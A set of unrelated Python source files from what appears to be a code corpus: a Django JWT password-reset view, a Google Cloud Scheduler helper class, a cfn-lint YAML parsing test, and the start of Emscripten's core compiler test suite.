return render(request, 'users/reset_password.html', {'form': form})
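# Sketch of the PyJWT round-trip the reset flow above relies on (the key and
# username are placeholders, not this project's settings):
#
#   import jwt
#   from datetime import datetime, timedelta
#   token = jwt.encode({'username': 'alice',
#                       'exp': datetime.utcnow() + timedelta(minutes=5)},
#                      'secret-key', algorithm='HS256')
#   payload = jwt.decode(token, 'secret-key', algorithms=['HS256'])
#   assert payload['username'] == 'alice'
#   # Once 'exp' has passed, jwt.decode raises jwt.ExpiredSignatureError,
#   # which new_password() below turns into an error message.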
def new_password(request, token):
try:
payload = jwt.decode(token, settings.SECRET_KEY, algorithms=['HS256'])
if request.method == 'POST':
form = ChangePasswordForm(request.POST)
if form.is_valid():
password = form.cleaned_data['password']
user = User.objects.get(username=payload['username'])
user.set_password(password)
user.save()
messages.success(request, 'Your password has been changed successfully!')
return redirect('users:login')
else:
form = ChangePasswordForm()
return render(request, 'users/new_password.html', {'username': payload['username'], 'form': form})
except jwt.ExpiredSignatureError:
messages.error(request, 'Your password reset token has been expired.')
except jwt.InvalidTokenError:
messages.error(request, 'Your password reset token is invalid.')
return redirect('users:password-reset')
|
py | 7dfac0c36ed09e27919b288d7e385261541f2c22 | # coding=utf-8
# Copyright 2021 Google LLC..
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Manage operations on Cloud Scheduler."""
import logging
from typing import Any, Dict, Optional, Tuple
import dataclasses
from googleapiclient import errors
from dependencies.cloud.utils import cloud_auth
# Default Cloud Scheduler configuration.
_LOCATION = 'us-central1'
_CLIENT_NAME = 'cloudscheduler'
_VERSION = 'v1beta1'
_TIMEZONE = 'GMT'
@dataclasses.dataclass
class AppEngineTarget:
"""A simple class representing the AppEngineTarget of the job."""
http_method: str
relative_uri: str
service: str
@dataclasses.dataclass
class HttpTarget:
"""A simple class representing the HttpTarget of the job."""
http_method: str
uri: str
body: str
headers: Dict[str, str]
# A tuple containing the serviceAccountEmail and the scope if
# authorization_header_type is equal to 'oauthToken', or audience if the
# authorization_header_type is equal to 'oidcToken'
authorization_header: Optional[Tuple[str, str]] = None
# One of: 'oauthToken', 'oidcToken'
authorization_header_type: Optional[str] = ''
class Error(Exception):
"""A generic error thrown for any exception in cloud_scheduler module."""
pass
class CloudSchedulerUtils:
"""CloudSchedulerUtils class provides methods to manage Cloud Scheduler.
This class manages Cloud Scheduler service within a single GCP project.
Typical usage example:
>>> scheduler = CloudSchedulerUtils(
'project_id',
'us-west1',
'[email protected]')
  >>> scheduler.create_appengine_http_job(
          'job_name',
          'job description',
          '* * * * 1',
          appengine_target_instance)
"""
def __init__(self,
project_id: str,
location: str = _LOCATION,
service_account_name: Optional[str] = None,
service_account_key_file: Optional[str] = None,
version: str = _VERSION):
"""Initializes new instance of CloudSchedulerUtils.
Args:
project_id: GCP project id.
location: Optional. Region under which the Cloud Scheduler needs to be
managed. It defaults to 'us-central1'. Allowed values -
https://cloud.google.com/compute/docs/regions-zones/.
service_account_name: The service account name.
service_account_key_file: Optional. File containing service account key.
        If not passed, the default credential will be used. There are the following
ways to create service accounts: 1. Use `build_service_client` method
from `cloud_auth` module. 2. Use `gcloud` command line utility as
documented here -
https://cloud.google.com/iam/docs/creating-managing-service-account-keys
version: The version of the service. It defaults to 'v1beta1'.
Raises:
ValueError: If neither service_account_key_file or service_account_name
were provided.
"""
if not service_account_key_file and not service_account_name:
raise ValueError(
'Service account key file or service account name is not provided. '
'Provide either path to service account key file or name of the '
'service account.')
if service_account_key_file:
credentials = cloud_auth.get_credentials(service_account_key_file)
self._client = cloud_auth.build_service_client(_CLIENT_NAME, credentials)
else:
self._client = cloud_auth.build_impersonated_client(
_CLIENT_NAME, service_account_name, version)
self._parent = f'projects/{project_id}/locations/{location}'
def create_appengine_http_job(self,
name: str,
description: str,
schedule: str,
target: AppEngineTarget,
timezone: Optional[str] = _TIMEZONE) -> str:
"""Creates a new AppEngine HTTP job.
Args:
name: The name of the job.
description: The description of the job.
schedule: A cron-style schedule string.
target: An AppEngineTarget instance containing the job target information.
      timezone: The timezone of the job.
Returns:
The job name.
Raises:
Error: If the request was not processed successfully.
"""
request_body = {
'name': name,
'description': description,
'schedule': schedule,
'timeZone': timezone,
'appEngineHttpTarget': {
'httpMethod': target.http_method,
'appEngineRouting': {
'service': target.service
},
'relativeUri': target.relative_uri
}
}
return self._create_job(request_body)
def create_http_job(self,
name: str,
description: str,
schedule: str,
target: HttpTarget,
timezone: Optional[str] = _TIMEZONE) -> str:
"""Creates a new HTTP job.
Args:
name: The name of the job.
description: The description of the job.
schedule: A cron-style schedule string.
target: An HttpTarget instance containing the job target information.
      timezone: The timezone of the job.
Returns:
The job name.
Raises:
Error: If the request was not processed successfully.
"""
request_body = {
'name': name,
'description': description,
'schedule': schedule,
'timeZone': timezone,
'httpTarget': {
'uri': target.uri,
'httpMethod': target.http_method,
'headers': target.headers,
'body': target.body
}
}
if target.authorization_header_type == 'oauthToken':
request_body['httpTarget'][target.authorization_header_type] = {
'serviceAccountEmail': target.authorization_header[0],
'scope': target.authorization_header[1]
}
elif target.authorization_header_type == 'oidcToken':
request_body['httpTarget'][target.authorization_header_type] = {
'serviceAccountEmail': target.authorization_header[0],
'audience': target.authorization_header[1]
}
return self._create_job(request_body)
def _create_job(self, request_body: Dict[str, Any]) -> str:
"""Creates a new Cloud Scheduler job.
Args:
request_body: A dictionary representing a Job instance.
Returns:
The job name.
Raises:
Error: If the request was not processed successfully.
"""
try:
job = self._client.projects().locations().jobs().create(
parent=self._parent,
body=request_body)
result = job.execute()
      return result['name']
except errors.HttpError as error:
logging.exception('Error occurred while creating job: %s', error)
raise Error(f'Error occurred while creating job: {error}')
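# Hedged usage sketch for the HTTP-target path above; the project id, URL and
# service account are illustrative placeholders.
#
#   target = HttpTarget(
#       http_method='POST',
#       uri='https://example.com/tasks/run',
#       body='{}',
#       headers={'Content-Type': 'application/json'},
#       authorization_header=('[email protected]',
#                             'https://example.com/tasks/run'),
#       authorization_header_type='oidcToken')
#   scheduler = CloudSchedulerUtils('my-project', service_account_name='sa-name')
#   scheduler.create_http_job('daily-run', 'Runs the task daily',
#                             '0 3 * * *', target)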
|
py | 7dfac142b42345c1192b00150605f2af852e1c37 | """
Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
SPDX-License-Identifier: MIT-0
"""
from test.testlib.testcase import BaseTestCase
from six import StringIO
from mock import patch
from cfnlint import Template # pylint: disable=E0401
from cfnlint.rules import RulesCollection
from cfnlint.core import DEFAULT_RULESDIR # pylint: disable=E0401
import cfnlint.decode.cfn_yaml # pylint: disable=E0401
class TestYamlParse(BaseTestCase):
"""Test YAML Parsing """
def setUp(self):
""" SetUp template object"""
self.rules = RulesCollection()
rulesdirs = [DEFAULT_RULESDIR]
for rulesdir in rulesdirs:
self.rules.create_from_directory(rulesdir)
self.filenames = {
"config_rule": {
"filename": 'test/fixtures/templates/public/lambda-poller.yaml',
"failures": 1
},
"generic_bad": {
"filename": 'test/fixtures/templates/bad/generic.yaml',
"failures": 35
}
}
def test_success_parse(self):
"""Test Successful YAML Parsing"""
for _, values in self.filenames.items():
filename = values.get('filename')
failures = values.get('failures')
template = cfnlint.decode.cfn_yaml.load(filename)
cfn = Template(filename, template, ['us-east-1'])
matches = []
matches.extend(self.rules.run(filename, cfn))
assert len(matches) == failures, 'Expected {} failures, got {} on {}'.format(
failures, len(matches), filename)
def test_success_parse_stdin(self):
"""Test Successful YAML Parsing through stdin"""
for _, values in self.filenames.items():
filename = '-'
failures = values.get('failures')
with open(values.get('filename'), 'r') as fp:
file_content = fp.read()
with patch('sys.stdin', StringIO(file_content)):
template = cfnlint.decode.cfn_yaml.load(filename)
cfn = Template(filename, template, ['us-east-1'])
matches = []
matches.extend(self.rules.run(filename, cfn))
assert len(matches) == failures, 'Expected {} failures, got {} on {}'.format(
failures, len(matches), values.get('filename'))
|
py | 7dfac2dc7102ff8c7693908c9e7e00124ae8d570 | # Copyright 2013 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
import hashlib
import json
import logging
import os
import random
import re
import shutil
import sys
import time
import unittest
from pathlib import Path
from functools import wraps
if __name__ == '__main__':
raise Exception('do not run this file directly; do something like: tests/runner')
from tools.shared import try_delete, PIPE
from tools.shared import PYTHON, EMCC, EMAR
from tools.utils import WINDOWS, MACOS
from tools import shared, building, config, webassembly
from common import RunnerCore, path_from_root, requires_native_clang, test_file, create_file
from common import skip_if, needs_dylink, no_windows, no_mac, is_slow_test, parameterized
from common import env_modify, with_env_modify, disabled, node_pthreads
from common import read_file, read_binary, require_node, require_v8
from common import NON_ZERO, WEBIDL_BINDER, EMBUILDER
import clang_native
# decorators for limiting which modes a test can run in
logger = logging.getLogger("test_core")
def wasm_simd(f):
def decorated(self):
self.require_v8()
if not self.is_wasm():
self.skipTest('wasm2js only supports MVP for now')
if '-O3' in self.emcc_args:
self.skipTest('SIMD tests are too slow with -O3 in the new LLVM pass manager, https://github.com/emscripten-core/emscripten/issues/13427')
self.emcc_args.append('-msimd128')
self.emcc_args.append('-fno-lax-vector-conversions')
self.v8_args.append('--experimental-wasm-simd')
f(self)
return decorated
def wasm_relaxed_simd(f):
def decorated(self):
# We don't actually run any tests yet, so don't require any engines.
if not self.is_wasm():
self.skipTest('wasm2js only supports MVP for now')
self.emcc_args.append('-mrelaxed-simd')
f(self)
return decorated
def needs_non_trapping_float_to_int(f):
def decorated(self):
if not self.is_wasm():
self.skipTest('wasm2js only supports MVP for now')
f(self)
return decorated
def also_with_wasm_bigint(f):
assert callable(f)
def metafunc(self, with_bigint):
assert self.get_setting('WASM_BIGINT') is None
if with_bigint:
if not self.is_wasm():
self.skipTest('wasm2js does not support WASM_BIGINT')
self.set_setting('WASM_BIGINT')
self.require_node()
self.node_args.append('--experimental-wasm-bigint')
f(self)
else:
f(self)
metafunc._parameterize = {'': (False,),
'bigint': (True,)}
return metafunc
# without EMTEST_ALL_ENGINES set we only run tests in a single VM by
# default. in some tests we know that cross-VM differences may happen and
# so are worth testing, and they should be marked with this decorator
def all_engines(f):
def decorated(self):
old = self.use_all_engines
self.use_all_engines = True
self.set_setting('ENVIRONMENT', 'web,node,shell')
try:
f(self)
finally:
self.use_all_engines = old
return decorated
# Tests exception handling / setjmp/longjmp handling in Emscripten EH/SjLj mode
# and if possible, new wasm EH/SjLj mode. This tests two combinations:
# - Emscripten EH + Emscripten SjLj
# - Wasm EH + Wasm SjLj
def with_both_eh_sjlj(f):
assert callable(f)
def metafunc(self, is_native):
if is_native:
# Wasm EH is currently supported only in wasm backend and V8
if not self.is_wasm():
self.skipTest('wasm2js does not support wasm EH/SjLj')
self.require_v8()
# FIXME Temporarily disabled. Enable this later when the bug is fixed.
if '-fsanitize=address' in self.emcc_args:
self.skipTest('Wasm EH does not work with asan yet')
self.emcc_args.append('-fwasm-exceptions')
self.set_setting('SUPPORT_LONGJMP', 'wasm')
self.v8_args.append('--experimental-wasm-eh')
f(self)
else:
self.set_setting('DISABLE_EXCEPTION_CATCHING', 0)
self.set_setting('SUPPORT_LONGJMP', 'emscripten')
# DISABLE_EXCEPTION_CATCHING=0 exports __cxa_can_catch and
# __cxa_is_pointer_type, so if we don't build in C++ mode, wasm-ld will
# error out because libc++abi is not included. See
# https://github.com/emscripten-core/emscripten/pull/14192 for details.
self.set_setting('DEFAULT_TO_CXX')
f(self)
metafunc._parameterize = {'': (False,),
'wasm': (True,)}
return metafunc
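# Hedged note on the `_parameterize` pattern used above: the test harness (not
# shown in this file) reads that mapping and registers one test per key,
# conceptually something like:
#
#   for suffix, params in metafunc._parameterize.items():
#       name = base_name + ('_' + suffix if suffix else '')
#       register(name, lambda self, p=params: metafunc(self, *p))
#
# so a test such as test_longjmp runs both as test_longjmp (Emscripten EH/SjLj)
# and test_longjmp_wasm (Wasm EH/SjLj).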
def no_wasm2js(note=''):
assert not callable(note)
def decorated(f):
return skip_if(f, 'is_wasm2js', note)
return decorated
def also_with_noderawfs(func):
assert callable(func)
def metafunc(self, rawfs):
if rawfs:
self.emcc_args += ['-DNODERAWFS']
self.set_setting('NODERAWFS')
self.js_engines = [config.NODE_JS]
func(self)
metafunc._parameterize = {'': (False,),
'rawfs': (True,)}
return metafunc
def can_do_standalone(self):
return self.is_wasm() and \
self.get_setting('STACK_OVERFLOW_CHECK', 0) < 2 and \
not self.get_setting('MINIMAL_RUNTIME') and \
not self.get_setting('SAFE_HEAP') and \
not self.get_setting('MEMORY64') and \
'-fsanitize=address' not in self.emcc_args and \
'-fsanitize=leak' not in self.emcc_args
def also_with_wasmfs(func):
def decorated(self):
func(self)
if self.get_setting('WASMFS'):
# Nothing more to test.
return
print('wasmfs')
if self.get_setting('STANDALONE_WASM'):
self.skipTest("test currently cannot run both with WASMFS and STANDALONE_WASM")
if self.get_setting('MEMORY64'):
self.skipTest("test currently cannot run both with WASMFS and WASMFS")
self.set_setting('WASMFS')
self.emcc_args = self.emcc_args.copy() + ['-DWASMFS']
func(self)
return decorated
# Similar to also_with_wasmfs, but also enables the full JS API
def also_with_wasmfs_js(func):
def decorated(self):
func(self)
print('wasmfs')
if self.get_setting('STANDALONE_WASM'):
self.skipTest("test currently cannot run both with WASMFS and STANDALONE_WASM")
if self.get_setting('MEMORY64'):
self.skipTest("test currently cannot run both with WASMFS and WASMFS")
self.set_setting('WASMFS')
self.set_setting('FORCE_FILESYSTEM')
self.emcc_args = self.emcc_args.copy() + ['-DWASMFS']
func(self)
return decorated
# Impure means a test that cannot run in a wasm VM yet, as it is not 100%
# standalone. We can still run them with the JS code though.
def also_with_standalone_wasm(wasm2c=False, impure=False):
def decorated(func):
def metafunc(self, standalone):
if not standalone:
func(self)
else:
if not can_do_standalone(self):
self.skipTest('Test configuration is not compatible with STANDALONE_WASM')
self.set_setting('STANDALONE_WASM')
# we will not legalize the JS ffi interface, so we must use BigInt
# support in order for JS to have a chance to run this without trapping
# when it sees an i64 on the ffi.
self.set_setting('WASM_BIGINT')
self.emcc_args.append('-Wno-unused-command-line-argument')
# if we are impure, disallow all wasm engines
if impure:
self.wasm_engines = []
self.js_engines = [config.NODE_JS]
self.node_args.append('--experimental-wasm-bigint')
func(self)
if wasm2c:
print('wasm2c')
self.set_setting('WASM2C')
self.wasm_engines = []
func(self)
metafunc._parameterize = {'': (False,),
'standalone': (True,)}
return metafunc
return decorated
def no_optimize(note=''):
assert not callable(note)
def decorator(func):
assert callable(func)
def decorated(self):
if self.is_optimizing():
self.skipTest(note)
func(self)
return decorated
return decorator
def needs_make(note=''):
assert not callable(note)
if WINDOWS:
return unittest.skip('Tool not available on Windows bots (%s)' % note)
return lambda f: f
def no_asan(note):
assert not callable(note)
def decorator(f):
assert callable(f)
@wraps(f)
def decorated(self, *args, **kwargs):
if '-fsanitize=address' in self.emcc_args:
self.skipTest(note)
f(self, *args, **kwargs)
return decorated
return decorator
def no_lsan(note):
assert not callable(note)
def decorator(f):
assert callable(f)
@wraps(f)
def decorated(self, *args, **kwargs):
if '-fsanitize=leak' in self.emcc_args:
self.skipTest(note)
f(self, *args, **kwargs)
return decorated
return decorator
def no_memory64(note):
assert not callable(note)
def decorator(f):
assert callable(f)
@wraps(f)
def decorated(self, *args, **kwargs):
if self.get_setting('MEMORY64'):
self.skipTest(note)
f(self, *args, **kwargs)
return decorated
return decorator
def no_wasmfs(note):
assert not callable(note)
def decorator(f):
assert callable(f)
@wraps(f)
def decorated(self, *args, **kwargs):
if self.get_setting('WASMFS'):
self.skipTest(note)
f(self, *args, **kwargs)
return decorated
return decorator
def make_no_decorator_for_setting(name):
def outer_decorator(note):
assert not callable(note)
def decorator(f):
assert callable(f)
@wraps(f)
def decorated(self, *args, **kwargs):
if (name + '=1') in self.emcc_args or self.get_setting(name):
self.skipTest(note)
f(self, *args, **kwargs)
return decorated
return decorator
return outer_decorator
no_minimal_runtime = make_no_decorator_for_setting('MINIMAL_RUNTIME')
no_safe_heap = make_no_decorator_for_setting('SAFE_HEAP')
def is_sanitizing(args):
return '-fsanitize=' in str(args)
class TestCoreBase(RunnerCore):
def is_wasm2js(self):
return self.get_setting('WASM') == 0
# A simple check whether the compiler arguments cause optimization.
def is_optimizing(self):
return '-O' in str(self.emcc_args) and '-O0' not in self.emcc_args
def should_use_closure(self):
# Don't run closure in all test modes, just a couple, since it slows
# the tests down quite a bit.
required = ('-O2', '-Os')
prohibited = ('-g', '--profiling')
return all(f not in self.emcc_args for f in prohibited) and any(f in self.emcc_args for f in required)
# Use closure in some tests for some additional coverage
def maybe_closure(self):
if '--closure=1' not in self.emcc_args and self.should_use_closure():
self.emcc_args += ['--closure=1']
logger.debug('using closure compiler..')
return True
return False
def assertStartswith(self, output, prefix):
self.assertEqual(prefix, output[:len(prefix)])
def verify_in_strict_mode(self, filename):
js = read_file(filename)
filename += '.strict.js'
with open(filename, 'w') as outfile:
outfile.write('"use strict";\n' + js)
self.run_js(filename)
def do_core_test(self, testname, **kwargs):
self.do_run_in_out_file_test(Path('core', testname), **kwargs)
def get_bullet_library(self, use_cmake):
if use_cmake:
configure_commands = ['cmake', '.']
configure_args = ['-DBUILD_DEMOS=OFF', '-DBUILD_EXTRAS=OFF', '-DUSE_GLUT=OFF']
# Depending on whether 'configure' or 'cmake' is used to build, Bullet
# places output files in different directory structures.
generated_libs = [Path('src/BulletDynamics/libBulletDynamics.a'),
Path('src/BulletCollision/libBulletCollision.a'),
Path('src/LinearMath/libLinearMath.a')]
else:
configure_commands = ['sh', './configure']
# Force a nondefault --host= so that the configure script will interpret
# that we are doing cross-compilation
# and skip attempting to run the generated executable with './a.out',
# which would fail since we are building a .js file.
configure_args = ['--disable-shared', '--host=i686-pc-linux-gnu',
'--disable-demos', '--disable-dependency-tracking']
generated_libs = [Path('src/.libs/libBulletDynamics.a'),
Path('src/.libs/libBulletCollision.a'),
Path('src/.libs/libLinearMath.a')]
return self.get_library('third_party/bullet', generated_libs,
configure=configure_commands,
configure_args=configure_args,
cache_name_extra=configure_commands[0])
@also_with_standalone_wasm()
@also_with_wasmfs
def test_hello_world(self):
self.do_core_test('test_hello_world.c')
# must not emit this unneeded internal thing
self.assertNotContained('EMSCRIPTEN_GENERATED_FUNCTIONS', read_file('test_hello_world.js'))
def test_wasm_synchronous_compilation(self):
self.set_setting('STRICT_JS')
self.set_setting('WASM_ASYNC_COMPILATION', 0)
self.do_core_test('test_hello_world.c')
@also_with_standalone_wasm()
def test_hello_argc(self):
self.do_core_test('test_hello_argc.c')
@also_with_wasmfs
def test_intvars(self):
self.do_core_test('test_intvars.cpp')
@also_with_wasmfs
def test_sintvars(self):
self.do_core_test('test_sintvars.c')
def test_int53(self):
self.emcc_args += ['-sDEFAULT_LIBRARY_FUNCS_TO_INCLUDE=[$convertI32PairToI53,$convertU32PairToI53,$readI53FromU64,$readI53FromI64,$writeI53ToI64,$writeI53ToI64Clamped,$writeI53ToU64Clamped,$writeI53ToI64Signaling,$writeI53ToU64Signaling]']
self.do_core_test('test_int53.c', interleaved_output=False)
def test_i64(self):
self.do_core_test('test_i64.c')
def test_i64_2(self):
self.do_core_test('test_i64_2.cpp')
def test_i64_3(self):
self.do_core_test('test_i64_3.cpp')
def test_i64_4(self):
# stuff that also needs sign corrections
self.do_core_test('test_i64_4.c')
def test_i64_b(self):
self.do_core_test('test_i64_b.cpp')
def test_i64_cmp(self):
self.do_core_test('test_i64_cmp.cpp')
def test_i64_cmp2(self):
self.do_core_test('test_i64_cmp2.c')
def test_i64_double(self):
self.do_core_test('test_i64_double.cpp')
def test_i64_umul(self):
self.do_core_test('test_i64_umul.c')
@also_with_standalone_wasm()
def test_i64_precise(self):
self.do_core_test('test_i64_precise.c')
def test_i64_precise_needed(self):
self.do_core_test('test_i64_precise_needed.c')
def test_i64_llabs(self):
self.do_core_test('test_i64_llabs.c')
def test_i64_zextneg(self):
self.do_core_test('test_i64_zextneg.c')
def test_i64_7z(self):
# needs to flush stdio streams
self.set_setting('EXIT_RUNTIME')
self.do_core_test('test_i64_7z.c', args=['hallo'])
def test_i64_i16(self):
self.do_core_test('test_i64_i16.c')
def test_i64_qdouble(self):
self.do_core_test('test_i64_qdouble.c')
def test_i64_varargs(self):
self.do_core_test('test_i64_varargs.c', args='waka fleefl asdfasdfasdfasdf'.split())
@no_wasm2js('wasm_bigint')
def test_i64_invoke_bigint(self):
self.set_setting('WASM_BIGINT')
self.emcc_args += ['-fexceptions']
self.node_args += ['--experimental-wasm-bigint']
self.do_core_test('test_i64_invoke_bigint.cpp', js_engines=[config.NODE_JS])
def test_vararg_copy(self):
self.do_run_in_out_file_test('va_arg/test_va_copy.c')
def test_llvm_fabs(self):
self.do_core_test('test_llvm_fabs.c')
def test_double_varargs(self):
self.do_core_test('test_double_varargs.c')
def test_trivial_struct_varargs(self):
self.do_core_test('test_trivial_struct_varargs.c')
def test_struct_varargs(self):
self.do_core_test('test_struct_varargs.c')
def test_zero_struct_varargs(self):
self.do_core_test('test_zero_struct_varargs.c')
def zzztest_nested_struct_varargs(self):
self.do_core_test('test_nested_struct_varargs.c')
def test_i32_mul_precise(self):
self.do_core_test('test_i32_mul_precise.c')
def test_i16_emcc_intrinsic(self):
# needs to flush stdio streams
self.set_setting('EXIT_RUNTIME')
self.do_core_test('test_i16_emcc_intrinsic.c')
def test_double_i64_conversion(self):
self.do_core_test('test_double_i64_conversion.c')
def test_float32_precise(self):
self.do_core_test('test_float32_precise.c')
def test_negative_zero(self):
self.do_core_test('test_negative_zero.c')
def test_literal_negative_zero(self):
self.do_core_test('test_literal_negative_zero.c')
@also_with_standalone_wasm()
def test_bswap64(self):
self.do_core_test('test_bswap64.cpp')
def test_sha1(self):
self.do_runf(test_file('sha1.c'), 'SHA1=15dd99a1991e0b3826fede3deffc1feba42278e6')
@no_memory64('tests 32-bit specific sizes')
def test_wasm32_unknown_emscripten(self):
# No other configuration is supported, so always run this.
self.do_runf(test_file('wasm32-unknown-emscripten.c'), '')
def test_cube2md5(self):
self.emcc_args += ['--embed-file', 'cube2md5.txt']
shutil.copyfile(test_file('cube2md5.txt'), 'cube2md5.txt')
self.do_run_from_file(test_file('cube2md5.cpp'), test_file('cube2md5.ok'), assert_returncode=NON_ZERO)
@also_with_standalone_wasm(wasm2c=True)
@needs_make('make')
def test_cube2hash(self):
# A good test of i64 math
self.do_run('// empty file', 'Usage: hashstring <seed>',
libraries=self.get_library('third_party/cube2hash', ['libcube2hash.a'], configure=None),
includes=[test_file('third_party/cube2hash')], assert_returncode=NON_ZERO)
for text, output in [('fleefl', '892BDB6FD3F62E863D63DA55851700FDE3ACF30204798CE9'),
('fleefl2', 'AA2CC5F96FC9D540CA24FDAF1F71E2942753DB83E8A81B61'),
('64bitisslow', '64D8470573635EC354FEE7B7F87C566FCAF1EFB491041670')]:
self.do_run('src.js', 'hash value: ' + output, args=[text], no_build=True)
def test_unaligned(self):
self.skipTest('LLVM marks the reads of s as fully aligned, making this test invalid')
src = r'''
#include <stdio.h>
struct S {
double x;
int y;
};
int main() {
// the 64-bit value here will not be 8-byte aligned
S s0[3] = { {0x12a751f430142, 22}, {0x17a5c85bad144, 98}, {1, 1}};
char buffer[10*sizeof(S)];
int b = int(buffer);
S *s = (S*)(b + 4-b%8);
s[0] = s0[0];
s[1] = s0[1];
s[2] = s0[2];
printf("*%d : %d : %d\n", sizeof(S), ((unsigned long)&s[0]) % 8 != ((unsigned long)&s[1]) % 8,
((unsigned long)&s[1]) - ((unsigned long)&s[0]));
s[0].x++;
s[0].y++;
s[1].x++;
s[1].y++;
printf("%.1f,%d,%.1f,%d\n", s[0].x, s[0].y, s[1].x, s[1].y);
return 0;
}
'''
# TODO: A version of this with int64s as well
self.do_run(src, '*12 : 1 : 12\n328157500735811.0,23,416012775903557.0,99\n')
return # TODO: continue to the next part here
# Test for undefined behavior in C. This is not legitimate code, but does exist
src = r'''
#include <stdio.h>
int main()
{
int x[10];
char *p = (char*)&x[0];
p++;
short *q = (short*)p;
*q = 300;
printf("*%d:%ld*\n", *q, ((long)q)%2);
int *r = (int*)p;
*r = 515559;
printf("*%d*\n", *r);
long long *t = (long long*)p;
*t = 42949672960;
printf("*%lld*\n", *t);
return 0;
}
'''
try:
self.do_run(src, '*300:1*\n*515559*\n*42949672960*\n')
except Exception as e:
assert 'must be aligned' in str(e), e # expected to fail without emulation
def test_align64(self):
src = r'''
#include <stdio.h>
// inspired by poppler
enum Type {
A = 10,
B = 20
};
struct Object {
Type type;
union {
int intg;
double real;
char *name;
};
};
struct Principal {
double x;
Object a;
double y;
};
int main(int argc, char **argv)
{
int base = argc-1;
Object *o = NULL;
printf("%zu,%zu\n", sizeof(Object), sizeof(Principal));
printf("%ld,%ld,%ld,%ld\n", (long)&o[base].type, (long)&o[base].intg, (long)&o[base].real, (long)&o[base].name);
printf("%ld,%ld,%ld,%ld\n", (long)&o[base+1].type, (long)&o[base+1].intg, (long)&o[base+1].real, (long)&o[base+1].name);
Principal p, q;
p.x = p.y = q.x = q.y = 0;
p.a.type = A;
p.a.real = 123.456;
*(&q.a) = p.a;
printf("%.2f,%d,%.2f,%.2f : %.2f,%d,%.2f,%.2f\n", p.x, p.a.type, p.a.real, p.y, q.x, q.a.type, q.a.real, q.y);
return 0;
}
'''
self.do_run(src, '''16,32
0,8,8,8
16,24,24,24
0.00,10,123.46,0.00 : 0.00,10,123.46,0.00
''')
@no_asan('asan errors on corner cases we check')
@no_lsan('lsan errors on corner cases we check')
def test_aligned_alloc(self):
self.do_runf(test_file('test_aligned_alloc.c'), '',
emcc_args=['-Wno-non-power-of-two-alignment'])
def test_unsigned(self):
src = '''
#include <stdio.h>
      const signed char cvals[2] = { -1, -2 }; // compiler can store this as a string, so -1 becomes \\FF, and needs re-signing
int main()
{
{
unsigned char x = 200;
printf("*%d*\\n", x);
unsigned char y = -22;
printf("*%d*\\n", y);
}
int varey = 100;
unsigned int MAXEY = -1, MAXEY2 = -77;
printf("*%u,%d,%u*\\n", MAXEY, varey >= MAXEY, MAXEY2); // 100 >= -1? not in unsigned!
int y = cvals[0];
printf("*%d,%d,%d,%d*\\n", cvals[0], cvals[0] < 0, y, y < 0);
y = cvals[1];
printf("*%d,%d,%d,%d*\\n", cvals[1], cvals[1] < 0, y, y < 0);
// zext issue - see mathop in jsifier
unsigned char x8 = -10;
unsigned long hold = 0;
hold += x8;
int y32 = hold+50;
printf("*%lu,%d*\\n", hold, y32);
// Comparisons
x8 = 0;
for (int i = 0; i < 254; i++) x8++; // make it an actual 254 in JS - not a -2
printf("*%d,%d*\\n", x8+1 == 0xff, x8+1 != 0xff); // 0xff may be '-1' in the bitcode
return 0;
}
'''
self.do_run(src, '*4294967295,0,4294967219*\n*-1,1,-1,1*\n*-2,1,-2,1*\n*246,296*\n*1,0*')
self.emcc_args.append('-Wno-constant-conversion')
src = '''
#include <stdio.h>
int main()
{
{
unsigned char x;
unsigned char *y = &x;
*y = -1;
printf("*%d*\\n", x);
}
{
unsigned short x;
unsigned short *y = &x;
*y = -1;
printf("*%d*\\n", x);
}
/*{ // This case is not checked. The hint for unsignedness is just the %u in printf, and we do not analyze that
unsigned int x;
unsigned int *y = &x;
*y = -1;
printf("*%u*\\n", x);
}*/
{
char x;
char *y = &x;
*y = 255;
printf("*%d*\\n", x);
}
{
char x;
char *y = &x;
*y = 65535;
printf("*%d*\\n", x);
}
{
char x;
char *y = &x;
*y = 0xffffffff;
printf("*%d*\\n", x);
}
return 0;
}
'''
self.do_run(src, '*255*\n*65535*\n*-1*\n*-1*\n*-1*')
def test_bitfields(self):
self.do_core_test('test_bitfields.c')
def test_floatvars(self):
self.do_core_test('test_floatvars.cpp')
def test_closebitcasts(self):
self.do_core_test('closebitcasts.c')
def test_fast_math(self):
self.emcc_args += ['-ffast-math']
self.do_core_test('test_fast_math.c', args=['5', '6', '8'])
def test_zerodiv(self):
self.do_core_test('test_zerodiv.c')
def test_zero_multiplication(self):
# needs to flush stdio streams
self.set_setting('EXIT_RUNTIME')
self.do_core_test('test_zero_multiplication.c')
def test_isnan(self):
self.do_core_test('test_isnan.c')
def test_globaldoubles(self):
self.do_core_test('test_globaldoubles.c')
def test_math(self):
self.do_core_test('test_math.c')
def test_erf(self):
self.do_core_test('test_erf.c')
def test_math_hyperbolic(self):
self.do_core_test('test_math_hyperbolic.c')
def test_math_lgamma(self):
self.do_run_in_out_file_test('math/lgamma.c', assert_returncode=NON_ZERO)
def test_math_fmodf(self):
self.do_run_in_out_file_test('math/fmodf.c')
def test_frexp(self):
self.do_core_test('test_frexp.c')
def test_rounding(self):
# needs to flush stdio streams
self.set_setting('EXIT_RUNTIME')
self.do_core_test('test_rounding.c')
def test_fcvt(self):
self.do_core_test('test_fcvt.cpp')
def test_llrint(self):
self.do_core_test('test_llrint.c')
def test_getgep(self):
# Generated code includes getelementptr (getelementptr, 0, 1), i.e., GEP as the first param to GEP
self.do_core_test('test_getgep.c')
def test_multiply_defined_symbols(self):
create_file('a1.c', 'int f() { return 1; }')
create_file('a2.c', 'void x() {}')
create_file('b1.c', 'int f() { return 2; }')
create_file('b2.c', 'void y() {}')
create_file('main.c', r'''
#include <stdio.h>
int f();
int main() {
printf("result: %d\n", f());
return 0;
}
''')
self.emcc('a1.c', ['-c'])
self.emcc('a2.c', ['-c'])
self.emcc('b1.c', ['-c'])
self.emcc('b2.c', ['-c'])
